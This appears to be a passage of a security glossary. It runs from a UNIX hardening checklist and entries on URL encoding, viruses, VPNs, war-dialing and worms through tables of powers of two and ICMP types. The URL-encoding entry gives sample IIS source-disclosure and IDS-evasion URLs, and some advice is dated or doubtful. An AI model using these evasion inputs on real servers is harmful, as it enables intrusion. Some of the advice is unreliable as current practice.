Always start from a fresh machine newly installed. When installing, do not install any options that aren't absolutely necessary. Many people are unsure if an option is needed, so they install it just to be sure. Do the opposite (don't install it in order to make sure you don't introduce a backdoor).
After installation, remove all unnecessary software; anything with an X Windows GUI is a good start.
Cleanse /etc/inetd.conf of all unnecessary services. For any server connected to the Internet, pretty much everything in there will be unnecessary.
Install a Tripwire-style package to detect when system files have changed (i.e. binaries in /sbin and configuration files in /etc). This doesn't secure the system, but it helps in detecting when intrusions have occurred. Note that this program is difficult to get running and maintain over the long term.
Install TCP Wrappers to log connections and provide some limited access control.
Shadow /etc/passwd. Remove all entries for disabled services and set a dummy shell for those accounts that shouldn't have shell access.
Redirect syslog to a secure system or dropbox.
Get rid of Telnet, use ssh. Plan to do all remote administration and file copies through ssh.
If you are extremely paranoid, put binaries on a CD-ROM. Some versions of open source UNIXes can even boot from CD-ROMs.
Install packet filtering software.
Install network intrusion detection software.
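Example (sketch): For the inetd.conf step in the list above, a short Python script can show which services are still enabled, i.e. which lines are not commented out. The sample file contents and the function name are invented for illustration; real files vary between systems.

```python
# Hypothetical /etc/inetd.conf contents for illustration.
SAMPLE_INETD_CONF = """\
# service  type    proto  wait    user  server                 arguments
ftp        stream  tcp    nowait  root  /usr/sbin/in.ftpd      in.ftpd
telnet     stream  tcp    nowait  root  /usr/sbin/in.telnetd   in.telnetd
#tftp      dgram   udp    wait    root  /usr/sbin/in.tftpd     in.tftpd
"""

def enabled_inetd_services(conf_text):
    """Return (service, protocol) for every line that is not commented out."""
    services = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue   # blank line or disabled entry
        fields = line.split()
        if len(fields) >= 3:
            services.append((fields[0], fields[2]))
    return services
```

On a hardened Internet server the goal is for this list to be empty, or very nearly so.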

Key point: Typical UNIX weaknesses are:

default passwords
weak (guessable, crackable) passwords
NIS misconfigurations
NFS holes
incorrect permissions
race conditions (esp. in /tmp)
exploitable SUID programs
sendmail problems
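
One of the weaknesses listed above, SUID programs, is easy to audit for. The following is a rough sketch only; the function name find_setuid is hypothetical, and it merely lists candidates for review rather than deciding which of them are exploitable.

```python
import os
import stat


def find_setuid(root):
    """Return sorted paths of regular files under root with the set-user-ID bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                info = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # file vanished or is unreadable
            if stat.S_ISREG(info.st_mode) and info.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)
```

Running find_setuid("/usr") on a fresh install and again later gives a quick way to spot SUID programs that have appeared since.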

URL encoding (application/x-www-form-urlencoded) [1]

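A problem exists when people need to send binary data as part of a URL. Therefore, URLs include the ability to "encode" binary information as part of the text field: any byte can be written as a percent sign followed by its two-digit hexadecimal value (for example, %2E for a dot).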

Key point: This encoding mechanism can be used to alter the signature of a hacker attack via web-based protocols. Such encoding can be used to evade detection by lightweight intrusion detection systems that are unable to "normalize" the URL.

Example: The Microsoft web server had a bug in its handling of ASP server-side scripts such that a hacker could append a dot to the end of the URL in order to read the script contents rather than executing the script. Microsoft created a patch, but hackers soon found they could evade the patch by URL-encoding the dot (appending a %2E to the end of the script name rather than a dot). Examples:

http://www.robertgraham.com/sample.asp Normal URL

http://www.robertgraham.com/sample.asp. Attempt to read script rather than executing it.

http://www.robertgraham.com/sample.asp%2E URL-encoding in order to evade patch.

http://www.robertgraham.com/sample.%61sp%2E Further URL-encoding in order to evade intrusion detection systems.
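
The "normalization" that a lightweight intrusion detection system skips can be sketched in a few lines. This is an illustration under assumptions, not the logic of any real product: the function names and the trailing-dot signature are hypothetical, and only a single round of decoding is performed.

```python
from urllib.parse import unquote


def normalize(url):
    """Decode %XX escapes so that encoded and plain forms compare equal."""
    return unquote(url)


def looks_like_source_probe(url):
    """Hypothetical signature: a request for an .asp script with a trailing dot."""
    return normalize(url).lower().endswith(".asp.")


for candidate in (
    "http://www.robertgraham.com/sample.asp",
    "http://www.robertgraham.com/sample.asp.",
    "http://www.robertgraham.com/sample.asp%2E",
    "http://www.robertgraham.com/sample.%61sp%2E",
):
    print(candidate, looks_like_source_probe(candidate))
```

A signature that matched the raw string ".asp." would catch only the second URL; matching after normalization catches the last three.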

USENET [1]

Key point: The USENET Death Penalty is often applied to NNTP servers in order to stop the flood of spam. It is often applied to ISPs who allow users to send lots of spam or allow their servers to be hijacked.

uucp (Unix-to-Unix Copy) [1]

UUCP is a service on a machine that can transfer files. In the olden days when connectivity was expensive, most machines were not permanently connected together but were instead part of an interconnected web of UUCP links. Machines would dial up peers and download/upload files on a scheduled basis. Most e-mail and USENET news were transported this way. E-mail addresses back in the 1980s consisted of long strings that specified each machine in the UUCP network. People held contests to see who could create the most convoluted route to send e-mail back to themselves over the longest distance across the world.

Key point: Even though it is rarely used today, uucp accounts and services are often enabled on UNIX machines in such a way that they can be exploited in order to break into the machine.

- V -

vi [3]

On UNIX, the vi program is a small text editor that can be run from the command-line. It can even be run in ed/ex mode that runs in line-mode rather than full-screen mode. Since vi is included on every UNIX system, this is the one program that all hackers learn to use. (More advanced editors like emacs may not be installed on a system that a hacker breaks into, leaving them out of luck if they don't know vi).

virus [1]

A virus is a piece of code that, when run, will attach itself to other programs, which will again run when those programs are run.

Analogy: A biological virus is not a "living" thing. Instead, it is simply a strand of DNA. When it enters a living cell, it takes control of the cell, forcing it to generate duplicate copies of the original DNA strand. In much the same way, a computer virus hijacks the computer, forcing it to generate duplicate copies of the original virus. Computer viruses are so common because humans do not practice sufficient cyber-hygiene when exchanging files.

Key point: An "anti-virus" program scans the disks on your system, hunting down those files that have signatures indicative of infected files. Since file-scanning technology is generic, most anti-virus programs also scan for other hostile content, such as trojans.

Contrast: The popular use of the word "virus" means any form of malware. For example, in the movie Office Space, the protagonists write what is called a "virus" that runs in the banking mainframe to steal round-off errors. In contrast, the technical definition limits itself to just those forms of contagious malware that spread by infecting other programs.

Key point: Viruses have a life cycle: they are originally created, distributed, found by anti-virus programs, then eradicated. They also mutate as script kiddies take viruses, make small alterations that avoid current virus scanners, and redistribute the viruses.

Example:

boot sector: Historically, the most popular kind of virus, though becoming less popular as floppies are used less often. E.g. Form Virus
macro virus: Data files cannot contain viruses -- except when they also include scripting "macros". Currently the most popular kind of virus. E.g. Marker Virus
file infector: The traditional definition of a virus: an executable file contains a virus embedded within. When run, it attaches the virus to other executables on the system.
multi-part: Uses more than one of the techniques above.

Culture: Viruses are rarely written by a single human being. Instead, they are often written by small groups or by individuals working within larger groups. This means that any particular virus is usually related to other viruses. Computer viruses mutate and exchange genetic material much like biological systems. What we classify as the "author" of a virus is usually somebody who made one small mutation that made a virus especially virulent.

VLAN (Virtual Local Area Network) [3]

A VLAN allows multiple virtual LANs to coexist on the same switched backbone. This means that two machines attached to the same switch, but assigned to different VLANs, cannot send Ethernet frames directly to each other. If they need to communicate, then a router must be placed between the two VLANs to forward packets, just as if the two LANs were physically isolated. The only difference is that the router in question may contain only a single Ethernet NIC that is part of both VLANs (a one-armed router).

Key point: Sometimes people want to put a firewall between VLANs, putting their DMZ on one VLAN and the rest of their company on another. This is an extraordinarily bad thing to do. VLANs are designed primarily to segment broadcast domains and improve performance and manageability. They are not hardened against security breaches. For example, Bay switches will forward packets incorrectly if the MAC address is known.

Key point: Most cable-modem and DSL connectivity is provided via VLANs over an ATM infrastructure. All the security concerns expressed above for VLANs apply to these technologies as well.

VPN (Virtual Private Network) [3]

A VPN allows the user to remotely connect to a company, via the Internet, with a secure connection that makes it appear ("virtually") as if the machine is on the corporate LAN. VPNs are used for employee-company and company-company connections.

Key point: One way that an employee can connect to a company is to put a modem in the machine and dial directly to modems inside the corporation. This is expensive due to long distance charges. But think for a moment that the employee can purchase two modems to put in the machine, and while dialed up to the corporation, the employee also dials up the Internet. This would mean that the employee has two active network connections: one to the corporation, one to the Internet. A VPN is the same thing, only the corporate connection and modem are "virtual".

Key point: Vendors claim that when the VPN is active, the previous Internet access is disabled and all further communication goes through the corporation. Therefore, if the user wants to browse the web while the VPN is active, the user must browse through firewalls/proxies inside the corporation then back out to the web. However, this is just a bit of sleight-of-hand: while it appears to the user that normal Internet communication has been disabled, in reality it has only been "hidden": a hacker can still compromise the machine from the Internet.

Key point: VPN puts the connection on the company's internal network, inside the firewall. Therefore, if a hacker compromises someone's machine who uses VPN, then the hacker has easy access to the inside of a hardened corporate environment.

- W -

war-dialing (demon-dialing, carrier-scanning) [2]

Wardialing was popularized in the 1983 movie War Games. It is the process of dialing all the numbers in a range in order to find any machine that answers. Many corporations have desktop computers with attached modems that hackers can dial in order to break into the desktop, and thereafter the corporation. Similarly, many companies have servers with attached modems that aren't considered as part of the general security scheme. Since most security emphasis these days is on Internet-related attacks, war-dialing represents the "soft underbelly" of the security infrastructure that can be exploited.

Tool: The program ToneLoc for DOS is one of the most popular among hackers for this purpose.

Key point: Many corporate desktops run PCAnywhere. This allows employees to access their desktop computers from home without the firewall-nazis blocking access. They also install PCAnywhere without those pesky passwords. Consequence: hackers who wardial often come up with PCAnywhere machines that they can easily connect to and use to break into companies.

Key point: Other popular applications that pick up dialup lines are Windows RAS servers, Laplink, and telnet-like terminal servers.

Countermeasure: Review your PBX logs. Also, set up honeypot dial-ins that can easily be broken into.

warez [2]

In the underground, warez refers to illegally copied software.

wild [2]

A phrase ("in the wild") that implies that the technique is currently being used, as opposed to being purely theoretical. For example, while tens of thousands of viruses are known to exist, only a few hundred can be found in the wild.

Windows [1]

Key point: On Windows, trailing dots on filenames are ignored. This means the filenames "foo" and "foo." are the same. However, most applications treat these two filenames as representing different files. Hackers can sometimes exploit this difference. For example, on older versions of IIS, this could often be used to read the contents of scripts rather than running them. Being able to read the script isn't necessarily a security breach, but a hacker could use the script in order to find other ways of breaking into the system.

WinNT [1]

Key point: Microsoft has obtained C2 certification for Windows NT. This doesn't mean that WinNT is more secure than other operating systems, but it does mean that WinNT has features required to harden a system according to this government specification.

wipe [3]

Erased data can frequently be retrieved. A common security measure is to "wipe" all traces of the data from a machine. The wiping process usually involves:

Clearing caches and logfiles. Examples include browser caches, cookie files, history logs, and recently used document lists. Note that passwords are often stored in cookies and history URLs.
Actually erasing deleted files. Hard-disks "erase" files by simply removing their entries from the directory; the files still exist on the hard-disk. The first step of wiping is to actually erase them by overwriting that area of the disk.
Overwriting erased areas of the hard-disk at least 7 times (DoD spec) in order to remove all magnetic traces. Forensics specialists can usually read data from a disk that has been overwritten only once.
Wiping the pagefile. Most programs do this by repeatedly allocating all possible memory in the system and then freeing it.
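
The overwrite step above can be sketched as follows. This is a minimal illustration, not a vetted wiping tool: the function name wipe_file is hypothetical, random bytes are an assumption (the DoD procedure specifies particular patterns), and the default of 7 passes is taken from the text. On journaling or copy-on-write filesystems and on flash storage, an in-place overwrite may not land on the same physical blocks, so the old data can survive.

```python
import os


def wipe_file(path, passes=7):
    """Overwrite a file in place with random bytes several times, then delete it."""
    size = os.path.getsize(path)
    with open(path, "r+b") as handle:
        for _ in range(passes):
            handle.seek(0)
            remaining = size
            while remaining > 0:
                chunk = min(remaining, 1 << 20)  # write at most 1 MiB at a time
                handle.write(os.urandom(chunk))
                remaining -= chunk
            handle.flush()
            os.fsync(handle.fileno())  # push this pass out to the disk
    os.remove(path)
```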

worm [2]

A program that propagates itself by attacking other machines and copying itself to them.

Example: In the late 1980s, the Morris Worm shut down the Internet for a couple of days. At the time, well-known bugs in the UNIX sendmail program could allow a hacker to break into machines. Robert T. Morris wrote a program that would scan machines for these security holes, then break into the machine. After breaking in, the program would copy itself up to that machine, then launch itself. In this manner, the worm spread from machine to machine, multiplying until it had broken into nearly every machine which contained these bugs. However, the worm itself had a bug where it couldn't detect that a machine had already been broken into. Therefore, it would repeatedly break into the same machine over and over, until the machine collapsed from running too many instances of the worm. Copycats of the Morris Worm pop up repeatedly as new security holes appear in popular systems (like Linux), but they never have the devastating effect of the Morris Worm.

Example: In the late 1990s, the Melissa Worm/Virus nearly disabled the Internet. The worm spread by e-mailing itself to the first 50 people in a user's e-mail address book. Victims would then receive an e-mail from somebody they knew and trusted, so they would open the attached document and run the macros. In this manner, Melissa spread from inbox to inbox. Melissa is sort of a cross between a virus and a worm: it had the ability to spread itself like a worm, but it still required user interaction.

Contrast: There really is no sharp difference between a worm and a virus. The dividing line is usually drawn along the amount of human interaction involved, and how it spreads from machine to machine. A worm spreads itself with zero human interaction, whereas a virus is spread by human contact: humans exchange files from machine to machine, and when a human runs the infected program, the virus only infects other files on the same machine. Some viruses do attack servers, but only because the user is connected to the server. The Melissa Virus/Worm crosses the line: it spreads from one machine to another like a worm, but it must be launched by the user like a virus.

- X -

X Windows [1]

X Windows forms the basis for most GUIs on UNIX. It is based upon a network protocol such that a program can run on one computer but be displayed on another. Conceptually, it is a graphical version of Telnet.

Key point: X Windows goes in the "wrong" direction. When you log into an X Windows host, the host opens a connection back to the display. As a consequence, it is very useful as a back-channel. In particular, the program xterm provides a raw command-prompt with which a hacker can interact just as if they had telnetted to the machine.

xor (exclusive-or) [3]

In computer science, an XOR is a mathematical operation that combines two bits. The resulting value is TRUE if exactly one of the two bits is TRUE, and FALSE if both are equal. In cryptography, one generally talks about doing an XOR combining two strings of bits:


plaintext   11100101 01110101
key         00001111 00001111
            -----------------
ciphertext  11101010 01111010

Moreover, XOR has the interesting property that XORing by the same pattern twice results in the original pattern:


ciphertext  11101010 01111010
key         00001111 00001111
            -----------------
plaintext   11100101 01110101

Therefore, you can think of XOR as an extremely weak encryption algorithm. The above example shows using XOR as a way of encrypting the original data with the 8-bit key of "00001111". Many products use this technique to obfuscate data. However, it is extremely easy to recover the original key via a known plaintext attack, as shown below:


ciphertext  11101010 01111010
plaintext   11100101 01110101
            -----------------
key         00001111 00001111
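
The three bit patterns worked through in this entry can be reproduced with a short sketch. The helper name xor_bytes is an assumption made for illustration; the plaintext and key values are the ones used in the entry.

```python
def xor_bytes(data, key):
    """XOR each byte of data with the key, repeating the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


plaintext = bytes([0b11100101, 0b01110101])
key = bytes([0b00001111])

# Encrypt, then apply the same key again to get the plaintext back.
ciphertext = xor_bytes(plaintext, key)
recovered = xor_bytes(ciphertext, key)

# Known plaintext attack: XORing ciphertext with plaintext exposes the key.
leaked_key = xor_bytes(ciphertext, plaintext)

for label, value in (("ciphertext", ciphertext),
                     ("recovered", recovered),
                     ("leaked key", leaked_key)):
    print(label, " ".join(format(b, "08b") for b in value))
```

Because the same function both encrypts and decrypts, anyone holding one plaintext/ciphertext pair gets the repeating key for free.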

Key point: XOR is a common mathematical operation used in cryptographic algorithms. In fact, the only 100% secure form of encryption is XORing against a one-time pad. Also, any hash algorithm can be converted into an encryption algorithm through a clever use of XOR.

1	2	4	8	16	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---
---	---	---	---	---	---	---	---

1	2	4	8	16	32	64	128
256	512	1024	2048	4096	8192	16384	32768
65536	131072	262144	524288	1048576	2097152	4194304	8388608
16777216	33554432	67108864	134217728	268435456	536870912	1073741824	2147483648
4294967296	8589934592	17179869184	34359738368	68719476736	137438953472	274877906944	549755813888
1099511627776	2199023255552	4398046511104	8796093022208	17592186044416	35184372088832	70368744177664	140737488355328
281474976710656	562949953421312	1125899906842624	2251799813685248	4503599627370496	9007199254740992	18014398509481984	36028797018963968
72057594037927936	144115188075855872	288230376151711744	576460752303423488	1152921504606846976	2305843009213693952	4611686018427387904	9223372036854775808

big-O	complexity	problem = 8 elements	problem = 32 elements
O(logn)	logarithmic	3 seconds	5 seconds
O(n)	linear	8 seconds	32 seconds
O(n²)	quadratic	1 minute	17 minutes
O(n³)	cubic	9 minutes	9 hours
O(2ⁿ)	exponential	4 minutes	136 years
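
The figures in the table above appear to assume one second per step and a base-2 logarithm; both are inferences from the numbers, not something the table states. Under those assumptions, a small sketch reproduces the growth (the names GROWTH and seconds_needed are hypothetical):

```python
import math

# Step counts for each complexity class (log taken base 2, an assumption).
GROWTH = {
    "O(log n)": lambda n: math.log2(n),
    "O(n)": lambda n: n,
    "O(n^2)": lambda n: n ** 2,
    "O(n^3)": lambda n: n ** 3,
    "O(2^n)": lambda n: 2 ** n,
}

SECONDS_PER_YEAR = 365.25 * 24 * 3600


def seconds_needed(label, n, seconds_per_step=1):
    """Running time in seconds for a problem of n elements."""
    return GROWTH[label](n) * seconds_per_step


for label in GROWTH:
    print(label, seconds_needed(label, 8), seconds_needed(label, 32))
```

Dividing the exponential result for 32 elements by SECONDS_PER_YEAR gives roughly 136, which matches the last row of the table.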

Type	Code	Name	Summary
0	*	Echo Reply ICMP_ECHOREPLY ping reply	A response to a ping. Many firewalls allow ping responses so that internal people can gain access to external resources. Therefore, they are an effective flooding technique. This means they also work well as a covert-channel. The massive DDoS attacks that took down the major Internet portals used commands embedded within ping responses to initiate the attacks. One of the attacks also used ping replies to flood the servers. Firewall: Either block incoming ping responses or rate limit them.
3	*	Destination Unreachable ICMP_UNREACH	An indication back from a host/router that some packet you sent did not reach its destination. Firewall: In practice, these are needed simply for helpful error messages explaining why communication failed. The only one strictly needed through a firewall is the one that indicates a router couldn't fragment a packet.
	0	Net Unreachable ICMP_UNREACH_NET	Route configuration problem or incorrectly specified IP address.
	1	Host Unreachable ICMP_UNREACH_HOST	It means that the router one hop before the desired host could not ARP the host.
	2	Protocol Unreachable ICMP_UNREACH_PROTOCOL	This means that the receiver of the packet does not have anything that recognizes the specified IP protocol of the packet. Key point: This is almost never seen on the wire in practice, and indicates either an intrusion or some massive configuration error.
	3	Port unreachable ICMP_UNREACH_PORT	The server tells the client that nobody is listening at the port the client attempted to contact.
	4	Fragmentation Needed but DF set ICMP_UNREACH_NEEDFRAG	Important: If you are seeing these in your firewall reject logs, then you've misconfigured your firewall. You should allow this packet to pass through, otherwise your clients will see their TCP connections mysteriously hang.
4	*	Source Quench ICMP_SOURCEQUENCH	Congestion on the Internet. Somebody could flood your network with these packets in an attempt to convince your machines to slow down transmitting data.
5	*	Redirect ICMP_REDIRECT	Somebody is trying to redirect your default router. This could be from a hacker trying to execute a man-in-the-middle attack against you by causing you to route through their own machine. [RFC792]
8	*	Echo Request ICMP_ECHO Ping	Ping.
9	*	Router Advertisement ICMP_ROUTERADVERT	There exists a hack against Win9x and Solaris such that a hacker can DoS you by redirecting your default router. A neighboring hacker can also do a man-in-the-middle attack by directing you through his/her router. [RFC1256]
11	*	Time Exceeded In Transit ICMP_TIMXCEED	It means that a packet never reached its target because something timed out.
	0	TTL Exceeded ICMP_TIMXCEED_INTRANS	Router dropped the packet either because of a routing loop or maybe because of a traceroute.
	1	Fragment reassembly timeout ICMP_TIMXCEED_REASS	The host dropped the packet because it didn't receive all the fragments.
12	*	Parameter Problem	Something unusual is going on; this probably indicates an attack.
13	*	Timestamp ICMP_TSTAMP	[RFC792]
14	*	Timestamp Reply ICMP_TSTAMPREPLY	[RFC792]

Payload	The data itself can be encrypted independent of the protocols used to transport it. For example, a typical use of PGP is to encrypt a message before sending via e-mail. All the e-mail programs and protocols are totally unaware that this has occurred.
Application Layer	Some applications have the ability to encrypt data automatically. For example, SMB can encrypt data as it goes across the wire.
Transport Layer	SSL is essentially encryption at the transport layer.
Network Layer	IPsec provides encryption at the network layer, encrypting all the contents above IP, including the TCP and UDP headers themselves.
